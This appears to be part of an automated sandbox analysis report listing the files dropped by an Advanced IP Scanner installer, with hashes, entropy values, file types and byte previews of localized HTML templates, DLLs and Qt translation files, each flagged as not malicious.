                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistem operasi:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Produsen:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Pengguna:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tipe:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Tanggal:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentar:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Layanan</center></b></td><td><b><center>Rincian</center>
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1159
                                                                                                                      Entropy (8bit):4.88658440484172
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFosMmsuSNXq2HJi4c3Q0Kt5RGDxReEhyv:Hx1sRNXq2HJS3Q0U2D7s
                                                                                                                      MD5:E133CA274E9A1C5B55A9AE459656E935
                                                                                                                      SHA1:B115F78BD0BA440A10A2ED5093712D7675F3E45C
                                                                                                                      SHA-256:D80655A9F288A1207F193025486A876F3B0BF30584F361FF04E8ECEBCB444DA0
                                                                                                                      SHA-512:CD4B9AEECE96654B462CF2887C3A6809FA083772016D078172D19C64332D072FE3A1E1F46EF7B1017F3FDAF9F7B0BDC131682BCA50645909FA5BDB807D66B2FB
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stav:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Opera.n. syst.m:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>V.robca:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Pou..vate.:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Typ:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>D.tum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Koment.re:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Slu.ba</center></b></td><td><b><center>Podrobnos
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1169
                                                                                                                      Entropy (8bit):4.842737243338588
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFollyUhsuShXqLHu8A0Kt5RGD1PyReEhyv:H+lySsRhXqLHu8A0U2D+s
                                                                                                                      MD5:59A017F97EA0743C741E972819CFEA19
                                                                                                                      SHA1:E6480E68B930A8595EACBAC255B3BFAFCC30D466
                                                                                                                      SHA-256:71D87CFE5437A1407EE398C94F33CBFC8B7DB2EBD7C05BD8A9F2D5817A0F5828
                                                                                                                      SHA-512:95B1DF32A4CFB88B8B086121DB65822D114420189F64CA429DE8578983DDA2C825EB017D1E30A1286B618B8B61DB16BB10B85609C88B840A3B5FC48558BF21EE
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>B.sena:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operacin. sistema:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Gamintojas:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Naudotojas:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Data:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentarai:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Paslauga</center></b></td><td><b><center>I.sami
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):498216
                                                                                                                      Entropy (8bit):6.392626000362742
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:lOssvQ+soy9eQdVgSTZuyvDTSVHyZ1Hy6:lsYvo4eQdKzW
                                                                                                                      MD5:C80BA989BA52F73AD4332EA7B3BE0499
                                                                                                                      SHA1:F4A2A70F2E23DB44AEC358F3DD282E68483AC631
                                                                                                                      SHA-256:C86C36B20B602D6A063575136ECB417EB0A7AD8DDDBB966750FA348FEB74D309
                                                                                                                      SHA-512:255862D9678F5380581F9C728327C3EA83D724A163ED35FA18BE22C35415E0E2819B8A4D2EACC0D94E53C5C3AB3D62AA2E978EF7C4F281C173C1C0A050A8EB5C
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.!...O...O...O.......O...N...O...J...O...K...O...L...O.X.K...O.X.N...O...N...O...N...O...J...O...O...O......O.......O...M...O.Rich..O.........PE..L.....&^...........!.....Z...`.......\.......p............................................@..........................{...8..\........0...............~..(....@..,....p..T....................q.......p..@............p...............................text...,X.......Z.................. ..`.rdata...j...p...l...^..............@..@.data....B..........................@....rsrc........0......................@..@.reloc..,....@......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:Qt Translation file
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):22516
                                                                                                                      Entropy (8bit):5.64342773223904
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:PojOWvws/b7HxRs55zmHpec+6V26K9lhjzy2aZ:wyWvwsT7RRs55zop7+82O
                                                                                                                      MD5:C09D31E3E2A0F6B673F8B26AA49B8E9E
                                                                                                                      SHA1:829B459D3642E84D0F0E0AE30D16203C583B1A88
                                                                                                                      SHA-256:30B8FD1F756F508C00F1B27051016F58B35A9F09490C6B1376B23E37F8EC8288
                                                                                                                      SHA-512:DA20D507F6AFE26A3EAD31C9AD2C5CDA174B8BCD907E8CB77D29F894DEE25A3567FC565C1D9155FDDDE9C2CD38AFDD1B119EC39918F0049330D4C4BE701C8884
                                                                                                                      Malicious:false
                                                                                                                      Preview:<.d....!..`...B..........E....;.......;...-...;...!...;.......;..5....O..H,...[..D....^..&5...^..Av..(5......G....|..H,..? ..K...2:..N:......V...6Q.._...I....... .......?G...y..?........_.......6......E....t.."#...t..?....t..G......2....j......5t...#..@...4s..H5..FY..f...&U......6................K...~..(....`..,....e..Gw......G........|. =...7..*.y.....*.y.....*.%...v.*.0.....+.......+.....~.+....,.+......+.....%.G.......G...."i.H0...G..Hw9.....Hw9.....I.... ..J6......J6....".J6......J6...9..LD......L.b..H..M.S..3^.R.......V....&w.Wi...G,.W.T...K.Z.|..@..[f3..C..gc....0.w0K..8...H....I......H....T...I..."..*....~..+... d..7K...T..%...2....k......F.......K..9.E..2..L.#..M..M$o...n.e.......l8...+a...^..9...I...........4.......A5......F}..>...-..>......3..%...l...;.......-..5.l..J..AV... q.y....E#...0..A.......A.......F)..tb..*................G......B.......0x......>..(....A..1V...!R.R....'..W.<..K[.f.~...@......)...1........^..*....5...=..........c..7..;6...L..q.J..>...I....o..I
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1180200
                                                                                                                      Entropy (8bit):6.806814022865445
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:cC5LQc2ki3TeGT5jWZKbROjq69Afqg0tPoqqHVd4qP02mn:cOB21uZKbR0DACg0tPSVyR2mn
                                                                                                                      MD5:C553D46852C7015A3DF581FBD2C02C3A
                                                                                                                      SHA1:D768260F818EA400BE5AD8F86280FB92DD37F341
                                                                                                                      SHA-256:F90FC5CD84EFE1F5AF152DF3FC95306782384DCBC738E5C383E705025C3B837B
                                                                                                                      SHA-512:42FBFE51991BA7FCAECADFED89AADCD3EDA74E63FD80E4FE630EB6E4957DB179CC1B32F7CB46F5AFA4749E461CF4E11A723172DAF4035EE1FB3AF60D49F531A6
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........T...:...:...:.....:.h.;...:.h.?...:.h.>...:.h.9...:..;...:...;.n.:..<...:......:..>...:..:...:......:..8...:.Rich..:.........................PE..L......]...........!.........p......?........................................@.......3....@.........................p?......l...h.......@...............(..........P9..T............................9..@...............d............................text............................... ..`.rdata...C.......D..................@..@.data...<........^..................@....rsrc...@............@..............@..@.reloc..............F..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1163
                                                                                                                      Entropy (8bit):4.810701494539991
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFo3WsuSsXq9e/Hu0Bk0Kt5RGDzLcReEhyv:HeWsRsXqqHu4k0U2DzL+s
                                                                                                                      MD5:C6CEF752D7D9FD44C45C67AE637EC697
                                                                                                                      SHA1:AD7D24492C5B44BBD96C0705308548BE46B5A743
                                                                                                                      SHA-256:4A9255685D393748B0E36243601E546222C005F1D24C99C97CDB3B926A27BC5D
                                                                                                                      SHA-512:0F4D2C69D548E5550A93CE5A8D8C58A6449D4432F561554ABA54880C154999D11360412CF15DED3261EA485C49976F173A49C211C22C2D80E8BFBACF981C168D
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Statut:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Syst.me d'exploitation:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Fabricant:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Utilisateur:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Date:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Commentaires:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>D.
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20672
                                                                                                                      Entropy (8bit):6.988142648004873
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:0Ok1JzNcKSIxW2hWFSUA0GftpBjluF3sBlvQyURz8o:0pcKSCUi++rvU2o
                                                                                                                      MD5:39047E168FFBDD19185504633D6ECA29
                                                                                                                      SHA1:FE3423689EFEDADA19C7DEC3D5DD077A057BF379
                                                                                                                      SHA-256:611B3E36AD3E0045AB4170A5D4E2D05FD2A26DDE2F7B09EA51F4264E263A544B
                                                                                                                      SHA-512:8B7D38726E302CDCF5A296E50CCC969B2B122432B93E2B5D1D1F4C1B6C2B3A9B64AF79BB65A7A9EAC31F563AE60934458F9316DD5CBB071FB0A3AD180FAC6103
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......~.....@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1168
                                                                                                                      Entropy (8bit):4.8708624632073105
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFokVpsuS4XqW1H5l+Ah1j0Kt5RGDLDiReEhyv:H9VpsR4XqW1H5lBh1j0U2DLDos
                                                                                                                      MD5:6A9A7FB51DD16A4EDBEAF52A7567EA70
                                                                                                                      SHA1:27B2444894F6B432AD36CB14D79BAD1BA6529887
                                                                                                                      SHA-256:C4AD3344E412976BD9F7B8DDC8C60FDB94461201C814529CC5300FFDEB35BC08
                                                                                                                      SHA-512:E627B085002A98E4C899FB4B9C7F4A90531C2D25233E3AD1ED0C4BFA87D0DE7D8E38F07D3CD0130955670D9C5F50F1D2BA40BBDF355F0FD202B1CE278A734F54
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Tila:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>K.ytt.j.rjestelm.:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Valmistaja:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>K.ytt.j.:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tyyppi:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>P.iv.m..r.:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentit:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Palvelu</center></b></td><td><b><ce
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:MS Windows icon resource - 9 icons, 16x16, 16 colors, 4 bits/pixel, 16x16, 8 bits/pixel
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):25214
                                                                                                                      Entropy (8bit):5.181706176676903
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:gZwwfjXDaFoDU90fQNBYNK30CCl77nQ6jtCuZEaaX/bv+NZmQDtLQIRLdc8ZDeO4:qLXDTQCQNmNa0CCl77nQ6viv6t2tMA
                                                                                                                      MD5:3511FCBA762713FBC4D83979F300A383
                                                                                                                      SHA1:61C33483A70C253FF38222021AD05E599F11E05C
                                                                                                                      SHA-256:AD6B11E0F7B0E9DDD0B3440AA0C9308F18E385C7EBB78452A964F77A104B789E
                                                                                                                      SHA-512:2CA49AE53A97FDD8AA857DFFFF281501506BAC8BD6B0D76B94CDA65592492A7DAA29FEC2CFD912DDBDCDEDEFF104BD21B00B2DED958C8BA7567536AFABE4D639
                                                                                                                      Malicious:false
                                                                                                                      Preview:..............(...............h....... ..........&... ..............00......h.......00.................... .h....'.. .... ......,..00.... ..%...<..(....... ...............................................................................................0...33..;...;.....ffo..6...3...o...`...o...`...o...`...o...`...o...o.......ww...ffn......n.......n.......fffg.................................................................................(....... ...........@.......................B...!{..cs..{{{.sss.{sk..s...Z...c..{ss.1...9......................9...s....R..............)...!{...1..{....9.................B....B................{..!........J.........{)...s..........k...........{c..B.................!..)...B...9.....................{...c...R...!......1...1.......................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1154
                                                                                                                      Entropy (8bit):4.79937338549848
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFou0BQsuSDQXqbd/Hulm0Kt5RGDz9ScReEhyv:HnkQsRkXqbhHulm0U2Dz9S+s
                                                                                                                      MD5:A420CCFD66627A25731173A49B1C98E1
                                                                                                                      SHA1:CFEDB045EB2F598E86B375A3C9297F4DE8D18F3A
                                                                                                                      SHA-256:FDAD9C0C105BE73D7DCA5B7CB0150D6670EE7BA2824D7DE27CB3F7C9B95CD465
                                                                                                                      SHA-512:99DEFA039F7F3C9697B1712658FCDBB33F72F93CD020796A001AEC90F3F46B2759D2DD4BF96F424F66047AB28A315C77DD292625A0514205136DE08C37054236
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Besturingssysteem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Fabrikant:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Gebruiker:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Opmerkingen:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>Details</c
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):19136
                                                                                                                      Entropy (8bit):7.000917619737006
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:QgxDfIeJWVghW/c7l9YOCAs/nGfe4pBjSfxyWNArXVWQ4mWgBHqnaj9RlS6V6Qg:JDfIeJW2hWk7QA0GftpBjxdBHlBRAky
                                                                                                                      MD5:C2EAD5FCCE95A04D31810768A3D44D57
                                                                                                                      SHA1:96E791B4D217B3612B0263E8DF2F00009D5AF8D8
                                                                                                                      SHA-256:42A9A3D8A4A7C82CB6EC42C62D3A522DAA95BEB01ECB776AAC2BFD4AA1E58D62
                                                                                                                      SHA-512:C90048481D8F0A5EDA2EB6E7703B5A064F481BB7D8C78970408B374CB82E89FEBC2E36633F1F3E28323FB633D6A95AA1050A626CB0CB5EC62E9010491AAE91F4
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:Qt Translation file
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):28561
                                                                                                                      Entropy (8bit):5.2596092915719215
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:O4suMMyQmmoRKIKfAoMzI4VxECTwTPJBLCsDbn:tsuMMypm/M04MCYTL/n
                                                                                                                      MD5:1D2AAC0633801D7DEF387CF78A968BFF
                                                                                                                      SHA1:D4721BBF3AA690683DCD75B690080A9785BF81B5
                                                                                                                      SHA-256:8FDF83BEB8D7E9D3CD0B77DDC636A77A1E4FF591ED10851229ED49BDC78644DF
                                                                                                                      SHA-512:956759A441647A00FCEA9AA4BE7DBA4463DDC6DA2EBBBFDF697BAED99CEF55B924D72F92E3443251C5C64927FF37DE345F95C366920ADFE829823105C3EB0673
                                                                                                                      Malicious:false
                                                                                                                      Preview:<.d....!..`...B..........[H...;...D...;.......;.......;..!....;..Ef...O..^,...[..Y....^..0....^..U...(5...m..G.......H,..R...K...A...N:......V...F..._..._`......).......R....y..S........7..............[ ...t..+O...t..S....t..]......B....j......5t...y..@...D}..H5..[...f...1!......Gn.......a...........~..4....`..9....e..]E......]k......... =...H..*.y...f.*.y...u.*.%..%F.*.0..%o.+.......+.......+......+......+....'..G.... ..G....+..H0...]..Hw9.....Hw9.....I....)@.J6......J6......J6......J6...K#.LD......L.b..^..M.S..C..R.......V....1O.Wi...\..W.T.....Z.|..Tm.[f3..Xd.gc......w0K..I...H...&-......^....T......."..6....~..8... d..G....T../W..2...........\L......b..9.E..B..L.#..e_.M$o...\.e.......l8...83...^..K`..I....J......D.......U_......\...>......>...z..3..0...l...L.......;..5.l..a..AV...(..y....ZW...0..V8......U.......[...tb..7.......................V.......?4......Q..(....U..1V...*&.R....2..W.<..b..f.~..".......5...1....g...^..7....5...[..........c..H@.;6...c..q.J..Q...I.......I
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1184
                                                                                                                      Entropy (8bit):5.02025670297611
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFo6jdsuSxFhXqNHidEy0Kt5RGDFE0GReEhyv:HZdsRDhXqNHidZ0U2DFE0ks
                                                                                                                      MD5:5B2A97F16B2382930301E6C2C8BFF7A7
                                                                                                                      SHA1:C66302E72DD2C5561D6187FA4276D78063915693
                                                                                                                      SHA-256:EDB89B8D25039530B47B0893A14CA803CE2DAF9A2358489ED3C335595B1B79DF
                                                                                                                      SHA-512:48C67FE96D43FE255156AA3DC94BFC8A6D57B39FC91B1CEF2B498CAC6914DBABB76CF32F193EF897182C6EACA3334D374B12AD53BC2242628E930A7B73C65BFC
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Tr.ng th.i:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>H. .i.u h.nh:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Nh. s.n xu.t:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Ng..i d.ng:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Ki.u:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Ng.y:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Nh.n x.t:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>D.ch v.</center></b></t
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):19136
                                                                                                                      Entropy (8bit):6.95985126360952
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:8l6W2hWJ7QA0GftpBj8VbJOAlXBtFwA+S:p+yi2VbJy4
                                                                                                                      MD5:1CD8672D8C08B39560A9D5518836493E
                                                                                                                      SHA1:C7CE2330265D07D88AD15F80DD88473F3DAAFCD0
                                                                                                                      SHA-256:4A5F33A0837A9D9F22D49EE6D062BAE671A4C5C5522DB6FFE03C1AA2C0BD008E
                                                                                                                      SHA-512:6BCE6EF09746C10E3B3F136BB2CE67002F27FF70C3FCBA48E7F1C3769000A62649A41FD82ACBE2A819B8ECE96D8E9399B15104CA2B40F65B51A0C84FC2A7901C
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:Qt Translation file
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):27888
                                                                                                                      Entropy (8bit):4.695402138614251
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:ZP5z0nT4x6kjXVkllEmXd6+TfM1nO6Pgv+n4kOby4WvJ:UT4MkbV2EUd6+cnO6YGn4M
                                                                                                                      MD5:B1DC69B7C86A8BEBB7B758BB8B241535
                                                                                                                      SHA1:B75C4FC69FAC889067A836AB620285984476B7D9
                                                                                                                      SHA-256:ADC549E5F4771AE234DB87847B9797C0217581B69C5A06A254877F19D225058F
                                                                                                                      SHA-512:62B262F6E79BC8D3A40506FB3CE6DE6528FCFD9C8D62C033584CEF56A0F70ECEAEA4E9B82951639593303AADC88E7758E069B8DE419C2539FC1E75A52F9BE1FD
                                                                                                                      Malicious:false
                                                                                                                      Preview:<.d....!..`...B..........X....;.......;.......;.......;..!a...;..Cl...O..[....[..W....^../....^..SX..(5......G....v..H,..PT..K...?...N:...B..V...D..._...\.......).......P}...y..P.......................X....t..*....t..Q\...t..[i.....@....j...q..5t......@...B...H5..Y...f...0.......Eh...................~..2....`..7B...e..Z.......[........R. =...Fw.*.y.....*.y.....*.%..$..*.0..%'.+.....a.+.......+......+....4.+....&..G.... ..G....+..H0...[;.Hw9.....Hw9.....I....(..J6....f.J6......J6......J6...I..LD......L.b..[..M.S..A0.R.......V....0;.Wi...Z..W.T.....Z.|..R-.[f3..U..gc....0.w0K..G...H...%.......\x...T...M..."..4....~..6... d..E....T...Q..2....k......Y.......`..9.E..@>.L.#..b..M$o...@.e.......l8...6m...^..IR..I....z......B.......S.......Y...>...{..>......3../...l...J.......9..5.l.._..AV...(_.y....X....0..S.......R.......YS..tb..5r.......+..............T?......=r......O..(....S..1V...)..R....1..W.<.._..f.~.."H......4^..1....+...^..5....5...#..........c..F0.;6...aE.q.J..O...I..../..I
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:Qt Translation file
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):28739
                                                                                                                      Entropy (8bit):4.641812949957873
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:fCwKr9wd6dllAddv/+l8hPMaupXxkMwWEXkw7NLgADR1w:fsrzdllA7H+l8hEOMwWWvA
                                                                                                                      MD5:65A1638D5074FA60210BB5B67A4E3DB3
                                                                                                                      SHA1:4A6B5C87D49F665BCECD0248ED0FB3BBCDF07682
                                                                                                                      SHA-256:23B63D04EEFAE8E50FFC6963C1E45511C7D034D54F94B17C9B1B53F899BFB340
                                                                                                                      SHA-512:D6A224A13C9E301DA124D660FD30B7FBBC8BADBA6484D39D1FDAC5410D44C48A963EA1182237FD72AD77609898C8F713CB22DCD7E20EA037BFAE6B8E25DB25C3
                                                                                                                      Malicious:false
